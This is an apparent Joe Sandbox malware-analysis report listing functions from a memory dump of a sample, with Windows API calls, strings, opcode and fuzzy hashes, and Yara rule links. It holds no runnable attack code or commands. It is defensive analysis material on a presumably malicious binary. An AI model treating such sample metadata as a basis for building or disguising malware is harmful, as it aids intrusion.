Opcode ID: 69284ac4727cefa2cd7ba1666b20883008b7e90e75abe2a95da80050e598c666
Instruction ID: a6c842058f22155eea15c295e8f5d3554972e6f50f639103f8706144953d2008
Opcode Fuzzy Hash: 69284ac4727cefa2cd7ba1666b20883008b7e90e75abe2a95da80050e598c666
Instruction Fuzzy Hash: 52A011EA2A8082BC300E2220AC02C3B020CC0C2F22330A82EFC2A888A0B8800E080830

Function 0035E55F Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0035E51F

Part of subcall function 0035E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0035E8D0
Part of subcall function 0035E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0035E8E1

Strings

PDu<5, xrefs: 0035E519

Memory Dump Source

Source File: 00000000.00000002.1653871028.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true

Associated: 00000000.00000002.1653850160.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653947444.0000000000373000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653974116.000000000037E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653974116.0000000000385000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653974116.00000000003A2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1654119576.00000000003A3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_340000_0V2JsCrGUB.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID: PDu<5
API String ID: 1269201914-1466653219
Opcode ID: b933183a6e10889773cd8562d889e6408846926c63d23a86c3c9aa462199ef7a
Instruction ID: a6c842058f22155eea15c295e8f5d3554972e6f50f639103f8706144953d2008
Opcode Fuzzy Hash: b933183a6e10889773cd8562d889e6408846926c63d23a86c3c9aa462199ef7a
Instruction Fuzzy Hash: 52A011EA2A8082BC300E2220AC02C3B020CC0C2F22330A82EFC2A888A0B8800E080830

Function 0035E541 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0035E51F

Part of subcall function 0035E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0035E8D0
Part of subcall function 0035E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0035E8E1

Strings

PDu<5, xrefs: 0035E519

Memory Dump Source

Source File: 00000000.00000002.1653871028.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true

Associated: 00000000.00000002.1653850160.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653947444.0000000000373000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653974116.000000000037E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653974116.0000000000385000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653974116.00000000003A2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1654119576.00000000003A3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_340000_0V2JsCrGUB.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID: PDu<5
API String ID: 1269201914-1466653219
Opcode ID: 6260a5e2adc49ae4394b8dc5b96c16ce7124d566a800006fa194804b12226a9b
Instruction ID: a6c842058f22155eea15c295e8f5d3554972e6f50f639103f8706144953d2008
Opcode Fuzzy Hash: 6260a5e2adc49ae4394b8dc5b96c16ce7124d566a800006fa194804b12226a9b
Instruction Fuzzy Hash: 52A011EA2A8082BC300E2220AC02C3B020CC0C2F22330A82EFC2A888A0B8800E080830

Function 0035E5A2 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0035E580

Part of subcall function 0035E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0035E8D0
Part of subcall function 0035E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0035E8E1

Strings

Fjun5, xrefs: 0035E57A

Memory Dump Source

Source File: 00000000.00000002.1653871028.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true

Associated: 00000000.00000002.1653850160.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653947444.0000000000373000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653974116.000000000037E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653974116.0000000000385000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653974116.00000000003A2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1654119576.00000000003A3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_340000_0V2JsCrGUB.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID: Fjun5
API String ID: 1269201914-2665998087
Opcode ID: dc1cf7d92c4e0c55c6979c65f2c88a9711cb96a3951bb4bdf0bda318c4f70adc
Instruction ID: ae7d105f9e6080b5609b3c72a35f3e1b2e98f4f37119d10d5f7605475abd9013
Opcode Fuzzy Hash: dc1cf7d92c4e0c55c6979c65f2c88a9711cb96a3951bb4bdf0bda318c4f70adc
Instruction Fuzzy Hash: 65A012C11681017C300E11505C02C37010CC0C1F52330981EFC1584490784019082430

Function 0035E58E Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0035E580

Part of subcall function 0035E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0035E8D0
Part of subcall function 0035E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0035E8E1

Strings

Fjun5, xrefs: 0035E57A

Memory Dump Source

Source File: 00000000.00000002.1653871028.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true

Associated: 00000000.00000002.1653850160.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653947444.0000000000373000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653974116.000000000037E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653974116.0000000000385000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653974116.00000000003A2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1654119576.00000000003A3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_340000_0V2JsCrGUB.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID: Fjun5
API String ID: 1269201914-2665998087
Opcode ID: 0a75565baa9b22afaffde0853c3789f910bcbd40d4ca93aa801a9b465cc01c87
Instruction ID: ae7d105f9e6080b5609b3c72a35f3e1b2e98f4f37119d10d5f7605475abd9013
Opcode Fuzzy Hash: 0a75565baa9b22afaffde0853c3789f910bcbd40d4ca93aa801a9b465cc01c87
Instruction Fuzzy Hash: 65A012C11681017C300E11505C02C37010CC0C1F52330981EFC1584490784019082430

Function 0036BBF0 Relevance: 3.2, APIs: 2, Instructions: 168COMMON

Download Yara Rule

APIs

Part of subcall function 0036B7BB: GetOEMCP.KERNEL32(00000000,?,?,0036BA44,?), ref: 0036B7E6

IsValidCodePage.KERNEL32(-00000030,00000000,?,?,?,?,0036BA89,?,00000000), ref: 0036BC64
GetCPInfo.KERNEL32(00000000,0036BA89,?,?,?,0036BA89,?,00000000), ref: 0036BC77

Memory Dump Source

Source File: 00000000.00000002.1653871028.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true

Associated: 00000000.00000002.1653850160.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653947444.0000000000373000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653974116.000000000037E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653974116.0000000000385000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653974116.00000000003A2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1654119576.00000000003A3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_340000_0V2JsCrGUB.jbxd

Similarity

API ID: CodeInfoPageValid
String ID:
API String ID: 546120528-0
Opcode ID: ea9a990a4387d98d60114847245f19e181f15b49df12af08ca56bcb527e448af
Instruction ID: f908c28a2ee1a3c002e6e333f5e922050ae9d94a62397b907e9bea819a11f4ef
Opcode Fuzzy Hash: ea9a990a4387d98d60114847245f19e181f15b49df12af08ca56bcb527e448af
Instruction Fuzzy Hash: 075124709002459FDB229F75C8916BAFBE8EF42300F14C46ED496CF266D7359A85CF90

Function 00349A74 Relevance: 3.1, APIs: 2, Instructions: 116COMMON

Download Yara Rule

APIs

SetFilePointer.KERNELBASE(000000FF,?,?,?,-00000870,00000000,00000800,?,00349A50,?,?,00000000,?,?,00348CBC,?), ref: 00349BAB
GetLastError.KERNEL32(?,00000000,00348411,-00009570,00000000,000007F3), ref: 00349BB6

Memory Dump Source

Source File: 00000000.00000002.1653871028.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true

Associated: 00000000.00000002.1653850160.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653947444.0000000000373000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653974116.000000000037E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653974116.0000000000385000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653974116.00000000003A2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1654119576.00000000003A3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_340000_0V2JsCrGUB.jbxd

Similarity

API ID: ErrorFileLastPointer
String ID:
API String ID: 2976181284-0
Opcode ID: fb1e4c01dcc5ea2bd38baee76b16bd0ad15730fd1f4dce30a35be13828f0628b
Instruction ID: 666755728239ea6616f8234464ebb3830392f7806bacd7193deee5796c998c17
Opcode Fuzzy Hash: fb1e4c01dcc5ea2bd38baee76b16bd0ad15730fd1f4dce30a35be13828f0628b
Instruction Fuzzy Hash: 3841BF316143018FDB26DF19E584A6BB7EAFFD4320F168A2FE8958B260D770FD448A51

Function 00341E50 Relevance: 3.1, APIs: 2, Instructions: 86COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00341E55

Part of subcall function 00343BBA: __EH_prolog.LIBCMT ref: 00343BBF

_wcslen.LIBCMT ref: 00341EFD

Memory Dump Source

Source File: 00000000.00000002.1653871028.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true

Associated: 00000000.00000002.1653850160.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653947444.0000000000373000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653974116.000000000037E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653974116.0000000000385000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653974116.00000000003A2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1654119576.00000000003A3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_340000_0V2JsCrGUB.jbxd

Similarity

API ID: H_prolog$_wcslen
String ID:
API String ID: 2838827086-0
Opcode ID: 1f7ad5b4e2fc5e0c06fa758f1c22cd0cbca95b35b8f11ccdad16128e29f0f4fb
Instruction ID: 4c2da5c038f3ec817a5f34bc25367e3c2c62ae627f7eace310267c84a6b4f65b
Opcode Fuzzy Hash: 1f7ad5b4e2fc5e0c06fa758f1c22cd0cbca95b35b8f11ccdad16128e29f0f4fb
Instruction Fuzzy Hash: 05313C75904609AFCF16DF98C945AEEFBF5EF48300F104069F845AB251CB366E95CB60

Function 00349DA2 Relevance: 3.1, APIs: 2, Instructions: 83timeCOMMON

Download Yara Rule

APIs

FlushFileBuffers.KERNEL32(?,?,?,?,?,?,003473BC,?,?,?,00000000), ref: 00349DBC
SetFileTime.KERNELBASE(?,?,?,?), ref: 00349E70

Memory Dump Source

Source File: 00000000.00000002.1653871028.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true

Associated: 00000000.00000002.1653850160.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653947444.0000000000373000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653974116.000000000037E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653974116.0000000000385000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653974116.00000000003A2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1654119576.00000000003A3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_340000_0V2JsCrGUB.jbxd

Similarity

API ID: File$BuffersFlushTime
String ID:
API String ID: 1392018926-0
Opcode ID: 6f9f24b04d7d3716c187c6b1e251b69f050ba9b6f4f1cca68f7584588cdb82e0
Instruction ID: 09ef6cca3d0237aa6106713661e4c5f3f6126942e2fa3425654edd06ee1d4832
Opcode Fuzzy Hash: 6f9f24b04d7d3716c187c6b1e251b69f050ba9b6f4f1cca68f7584588cdb82e0
Instruction Fuzzy Hash: 1221E132248285EFC716CF34C891BABBBE8AF56304F09491EF8C58B551D329E94CDB61

Function 0034966E Relevance: 3.1, APIs: 2, Instructions: 82fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNELBASE(?,?,00000001,00000000,00000002,00000000,00000000,?,00000000,?,?,?,00349F27,?,?,0034771A), ref: 003496E6
CreateFileW.KERNEL32(?,?,00000001,00000000,00000002,00000000,00000000,?,?,00000800,?,?,00349F27,?,?,0034771A), ref: 00349716

Memory Dump Source

Source File: 00000000.00000002.1653871028.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true

Associated: 00000000.00000002.1653850160.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653947444.0000000000373000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653974116.000000000037E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653974116.0000000000385000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653974116.00000000003A2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1654119576.00000000003A3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_340000_0V2JsCrGUB.jbxd

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: 6f5730b0c95e9513775c1756f9e71c081eb5021fe6d528ec7b0ffb97cdd3674a
Instruction ID: 4f1d8ad6e8601783316e7310376ed13838495df36680228d9ac06baf5ccc553f
Opcode Fuzzy Hash: 6f5730b0c95e9513775c1756f9e71c081eb5021fe6d528ec7b0ffb97cdd3674a
Instruction Fuzzy Hash: 9321C1711043446FE3718A65CC89FA7B7DCEB49331F020A1AF996CA5D1C7B8B8849A31

Function 00349E80 Relevance: 3.1, APIs: 2, Instructions: 56COMMON

Download Yara Rule

APIs

SetFilePointer.KERNELBASE(000000FF,00000000,00000000,00000001), ref: 00349EC7
GetLastError.KERNEL32 ref: 00349ED4

Memory Dump Source

Source File: 00000000.00000002.1653871028.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true

Associated: 00000000.00000002.1653850160.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653947444.0000000000373000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653974116.000000000037E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653974116.0000000000385000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653974116.00000000003A2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1654119576.00000000003A3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_340000_0V2JsCrGUB.jbxd

Similarity

API ID: ErrorFileLastPointer
String ID:
API String ID: 2976181284-0
Opcode ID: bc7a0ef8cedd4936e3015a0c3e1830d21b39754fcd9b0d0a4a3af7587773f176
Instruction ID: 2b3bb0331f8cb597633c3f4fcc0a9ae898be054c45ccbf6294f8175339948d00
Opcode Fuzzy Hash: bc7a0ef8cedd4936e3015a0c3e1830d21b39754fcd9b0d0a4a3af7587773f176
Instruction Fuzzy Hash: C011C230600700ABD736D628CC45BA7B7ECEB45360F614A2AE153DAAD0D770FD89D760

Function 00368E54 Relevance: 3.0, APIs: 2, Instructions: 44memoryCOMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 00368E75

Part of subcall function 00368E06: RtlAllocateHeap.NTDLL(00000000,?,00000000,?,0036CA2C,00000000,?,00366CBE,?,00000008,?,003691E0,?,?,?), ref: 00368E38

HeapReAlloc.KERNEL32(00000000,?,?,?,00000007,00381098,003417CE,?,?,00000007,?,?,?,003413D6,?,00000000), ref: 00368EB1

Memory Dump Source

Source File: 00000000.00000002.1653871028.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true

Associated: 00000000.00000002.1653850160.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653947444.0000000000373000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653974116.000000000037E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653974116.0000000000385000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653974116.00000000003A2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1654119576.00000000003A3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_340000_0V2JsCrGUB.jbxd

Similarity

API ID: Heap$AllocAllocate_free
String ID:
API String ID: 2447670028-0
Opcode ID: df9587420fa9e4418bc52b243fefbb63ae8c422f38c369f1bca5cce3c84695b9
Instruction ID: 250afc2fb6f14aeadba0498c28a500549ab206f24d3c70499e8e65c24bb227ec
Opcode Fuzzy Hash: df9587420fa9e4418bc52b243fefbb63ae8c422f38c369f1bca5cce3c84695b9
Instruction Fuzzy Hash: CEF0F6322011156ADB332B259C04B6F376C8F9AB70F26C726F818AA199DFB3CD0081E0

Function 0035109E Relevance: 3.0, APIs: 2, Instructions: 33COMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(?,?), ref: 003510AB
GetProcessAffinityMask.KERNEL32(00000000), ref: 003510B2

Memory Dump Source

Source File: 00000000.00000002.1653871028.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true

Associated: 00000000.00000002.1653850160.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653947444.0000000000373000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653974116.000000000037E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653974116.0000000000385000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653974116.00000000003A2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1654119576.00000000003A3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_340000_0V2JsCrGUB.jbxd

Similarity

API ID: Process$AffinityCurrentMask
String ID:
API String ID: 1231390398-0
Opcode ID: 654f993612f32098dae264bb9a94898afca038e2a319609898db5e75c92b2e7d
Instruction ID: e03c481cf3ae4685e6b9c76d5ce66e5c0b4256540024ca4ad4bd70300c8090b9
Opcode Fuzzy Hash: 654f993612f32098dae264bb9a94898afca038e2a319609898db5e75c92b2e7d
Instruction Fuzzy Hash: 6DE0D832B10159A7CF1B87B49C05EEFB3DDEA443097154175E803D3151F934DE854660

Function 0034A4ED Relevance: 3.0, APIs: 2, Instructions: 29COMMON

Download Yara Rule

APIs

SetFileAttributesW.KERNELBASE(?,00000000,00000001,?,0034A325,?,?,?,0034A175,?,00000001,00000000,?,?), ref: 0034A501

Part of subcall function 0034BB03: _wcslen.LIBCMT ref: 0034BB27

SetFileAttributesW.KERNEL32(?,00000000,?,?,00000800,?,0034A325,?,?,?,0034A175,?,00000001,00000000,?,?), ref: 0034A532

Memory Dump Source

Source File: 00000000.00000002.1653871028.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true

Associated: 00000000.00000002.1653850160.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653947444.0000000000373000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653974116.000000000037E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653974116.0000000000385000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653974116.00000000003A2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1654119576.00000000003A3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_340000_0V2JsCrGUB.jbxd

Similarity

API ID: AttributesFile$_wcslen
String ID:
API String ID: 2673547680-0
Opcode ID: 5f3abfc36b1d66a58e6245a6c4e4cdd3d1d1856a58a5e97f4b21177a2a02f8e4
Instruction ID: a6be760554f866e3bb843fec3d25a7f2dcce4537fd97063ca75b7492077e86a0
Opcode Fuzzy Hash: 5f3abfc36b1d66a58e6245a6c4e4cdd3d1d1856a58a5e97f4b21177a2a02f8e4
Instruction Fuzzy Hash: 52F06D32240209BBDF135F60DC45FDA37ACAF04385F4880A1BD89DA160DB71EAD8EB50

Function 0034A1E0 Relevance: 3.0, APIs: 2, Instructions: 27fileCOMMON

Download Yara Rule

APIs

DeleteFileW.KERNELBASE(000000FF,?,?,0034977F,?,?,003495CF,?,?,?,?,?,00372641,000000FF), ref: 0034A1F1

Part of subcall function 0034BB03: _wcslen.LIBCMT ref: 0034BB27

DeleteFileW.KERNEL32(?,000000FF,?,00000800,?,?,0034977F,?,?,003495CF,?,?,?,?,?,00372641), ref: 0034A21F

Memory Dump Source

Source File: 00000000.00000002.1653871028.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true

Associated: 00000000.00000002.1653850160.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653947444.0000000000373000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653974116.000000000037E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653974116.0000000000385000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653974116.00000000003A2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1654119576.00000000003A3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_340000_0V2JsCrGUB.jbxd

Similarity

API ID: DeleteFile$_wcslen
String ID:
API String ID: 2643169976-0
Opcode ID: 93955a1488c353a19c3b72e716ca910bf1e9ab2dcf5e25898bb42a298ff009ff
Instruction ID: 81a9744c31515ad62276e9b29edc87e3f389baf0b689b77ab8cb918455049167
Opcode Fuzzy Hash: 93955a1488c353a19c3b72e716ca910bf1e9ab2dcf5e25898bb42a298ff009ff
Instruction Fuzzy Hash: F3E0D8321442097BDB135F60DC45FD9379CAF0C3C2F484021B949DA060EB71EEC4EA50

Function 0035AC7C Relevance: 3.0, APIs: 2, Instructions: 26COMMON

Download Yara Rule

APIs

GdiplusShutdown.GDIPLUS(?,?,?,?,00372641,000000FF), ref: 0035ACB0
CoUninitialize.COMBASE(?,?,?,?,00372641,000000FF), ref: 0035ACB5

Memory Dump Source

Source File: 00000000.00000002.1653871028.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true

Associated: 00000000.00000002.1653850160.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653947444.0000000000373000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653974116.000000000037E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653974116.0000000000385000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653974116.00000000003A2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1654119576.00000000003A3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_340000_0V2JsCrGUB.jbxd

Similarity

API ID: GdiplusShutdownUninitialize
String ID:
API String ID: 3856339756-0
Opcode ID: f7049de2c62ed468f99c1dae73791c68e15e22f02363458debefc58df3f43a79
Instruction ID: eb582bf7a2d3071e10f875fedc32dfe4839c568d7d4faceab7afeffdfafbc52b
Opcode Fuzzy Hash: f7049de2c62ed468f99c1dae73791c68e15e22f02363458debefc58df3f43a79
Instruction Fuzzy Hash: 1BE06572504650EFCB129B59DC06F45FBACFB89B20F10426AF416D3760CB746940CA90

Function 0034A243 Relevance: 3.0, APIs: 2, Instructions: 25COMMON

Download Yara Rule

APIs

GetFileAttributesW.KERNELBASE(?,?,?,0034A23A,?,0034755C,?,?,?,?), ref: 0034A254

Part of subcall function 0034BB03: _wcslen.LIBCMT ref: 0034BB27

GetFileAttributesW.KERNELBASE(?,?,?,00000800,?,0034A23A,?,0034755C,?,?,?,?), ref: 0034A280

Memory Dump Source

Source File: 00000000.00000002.1653871028.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true

Associated: 00000000.00000002.1653850160.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653947444.0000000000373000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653974116.000000000037E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653974116.0000000000385000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653974116.00000000003A2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1654119576.00000000003A3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_340000_0V2JsCrGUB.jbxd

Similarity

API ID: AttributesFile$_wcslen
String ID:
API String ID: 2673547680-0
Opcode ID: 263a89b49e51f82a0501ca63553087a15c45020ac7a2bc707f423f9d31afbee4
Instruction ID: 25be1ca1b77b4b02a19e0ef5d4e053d71dc01d32940dd0abd6c184153e044690
Opcode Fuzzy Hash: 263a89b49e51f82a0501ca63553087a15c45020ac7a2bc707f423f9d31afbee4
Instruction Fuzzy Hash: 7EE092715001245BCB22AB64CC05FD9B79CAB083E2F044661FD99EB190D770EE84DAA0

Function 0035DEC2 Relevance: 3.0, APIs: 2, Instructions: 25COMMON

Download Yara Rule

APIs

_swprintf.LIBCMT ref: 0035DEEC

Part of subcall function 00344092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 003440A5

SetDlgItemTextW.USER32(00000065,?), ref: 0035DF03

Part of subcall function 0035B568: PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 0035B579
Part of subcall function 0035B568: GetMessageW.USER32(?,00000000,00000000,00000000), ref: 0035B58A
Part of subcall function 0035B568: IsDialogMessageW.USER32(00010466,?), ref: 0035B59E
Part of subcall function 0035B568: TranslateMessage.USER32(?), ref: 0035B5AC
Part of subcall function 0035B568: DispatchMessageW.USER32(?), ref: 0035B5B6

Memory Dump Source

Source File: 00000000.00000002.1653871028.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true

Associated: 00000000.00000002.1653850160.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653947444.0000000000373000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653974116.000000000037E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653974116.0000000000385000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653974116.00000000003A2000.00000004.00000001.01000000.00000003.sdmpDownload File
